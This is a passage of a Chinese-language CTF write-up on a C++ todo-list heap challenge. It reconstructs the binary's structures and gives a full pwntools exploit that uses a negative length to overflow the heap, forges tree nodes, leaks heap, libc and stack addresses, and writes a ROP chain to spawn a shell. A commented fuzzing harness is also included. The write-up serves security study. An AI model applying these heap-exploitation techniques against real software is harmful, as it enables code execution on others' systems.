title; // 检查标题是否已存在 auto it = todo.find(title); if (it != todo.end()) { std::cout << "Already exists" << std::endl; return start_time - __readfsqword(0x28u); } // 读取长度 std::cout << "Length: "; std::cin >> len; unsigned int len_more1 = len + 1; // 分配内存 todo_node_chunk = new char[len_more1]; if (len_more1) { memset(todo_node_chunk, 0, len_more1); } // 插入红黑树 todo[title] = {todo_node_chunk, len}; // 处理异常 if (!todo[title].content) { std::cout << "Out of memory" << std::endl; delete[] title; std::__throw_bad_alloc(); } // 清理和返回 if (title != nullptr) { delete[] title; } return start_time - __readfsqword(0x28u); } int main() { todo_add(); return 0; } ``` 刚开始add由于rootnode不存在,会去`LABEL_34`先初始化 先拿个实例编译下带符号表,然后再放IDA里看。大概弄出逻辑 ```c struct node { _DWORD color; _QWORD parents; _QWORD left_son_node; _QWORD right_son_node; struct string title_str_obj; struct pair todo_pair; }; struct map { _QWORD key_compare; _QWORD color; _QWORD parents; _QWORD left; _QWORD right; _QWORD node_count; }; struct pair { _QWORD todo_ptr; _QWORD todo_len; }; struct string { _QWORD ptr; _QWORD size; char str[16]; }; ``` 一个todo\_add就是增加一个节点 由于edit会结尾把换行符号改为零字节。不能溢出然后输出泄露 泄露后发现没有IO,std::cout不知道可不可行 但能控制node然后来任意地址读写,由于只有一开始的根节点的parent是指向map,其余的node里的parent都是指向堆地址。所以可以溢出来伪造覆盖。然后设置todo\_ptr为environ,泄露栈。然后再通过edit改todo\_ptr为栈,再写rop就行 或者UAF写fd也行 下次记得fuzz对size这方面也要随机些,感觉都束缚为正数了,所以没爆出来 exp --- ```python from pwn import * import random context(os="linux",arch="amd64",log_level="debug") def randinit(n): return random.randint(1, n) def new(title,length): p.sendlineafter(b"> ",str(1)) p.sendlineafter(b"Title: ",title) result=p.recvuntil(b"1. New todo",timeout=0.5) if b"Already exists" in result: return p.sendline(length) def remove(title): p.sendlineafter(b"> ",str(2)) p.sendlineafter(b"Title: ",title ) def edit(title,content): p.sendlineafter(b"> ",str(3)) p.sendlineafter(b"Title: ",title) p.sendlineafter(b"TODO: ",content) def show(title): p.sendlineafter(b"> ",str(4)) p.sendlineafter(b"Title: ",title) p=process("./chall") gdb.attach(p) pause() new(str(1),str(-1)) remove(str(1)) new(str(1),str(-1)) show(str(1)) # leak heap p.recvuntil(b"TODO: ") heap=u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00"))<<12 print("heap leak "+hex(heap)) new(str(2),str(-1)) new(str(3),str(-1)) new(str(4),str(-1)) new(str(5),str(-1)) new(str(6),str(-1)) new(str(7),str(-1)) new(str(8),str(-1)) new(str(9),str(-1)) new(str(10),str(-1)) new(str(11),str(-1)) payload=b"1"*0x10+b"\x00"*8+p64(0x461) edit(str(1),payload) remove(str(1)) new(str(1),str(-1)) show(str(2)) # leak libc p.recvuntil(b"TODO: ") libc=u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00"))-0x203b20 print("libc leak "+hex(libc)) payload=b"1"*0x10+b"\x00"*8+p64(0x61)+p64(0)+p64(heap+0x750)+p64(0)+p64(0)+p64(heap+0x300)+p64(1)+p64(0x31)+p64(0) +p64(libc+0x20ad58)+p64(0x100) edit(str(1),payload) show(str(1)) p.recvuntil(b"TODO: ") stack=u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00")) print("stack leak "+hex(stack)) payload=b"1"*0x10+b"\x00"*8+p64(0x61)+p64(0)+p64(heap+0x450)+p64(heap+0x750)+p64(heap+0x3d0)+p64(heap+0x380)+p64(1)+p64(0x32)+p64(0) +p64(stack-0x148)+p64(0x100) edit(str(2),payload) pause() bin_sh=libc+0x1cb42f sys=libc+0x58740 ret=libc+0x000000000002882f pop_rdi=libc+0x000000000010f75b rop=p64(0)+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(sys) edit(str(2),rop) p.interactive() # pause() # index=0 # file=open('fuzz.txt', 'w') # p=process("./chall") # gdb.attach(p) # # pause() # for i in range(0x1000): # match randinit(2): # case 1: # length=randinit(0x1000) # title=str(index) # new(title,str(length)) # file.write("insert size"+str(1)+"\n") # file.flush() # case 2: # index=randinit(0x100) # remove(str(index)) # file.write("remove title "+str(index)+"\n") # file.flush() # case 3: # len=random.randint(0x1000, 0x1100) # payload=len*b"a" # edit(payload) # file.write("edit \n") # file.flush() ```
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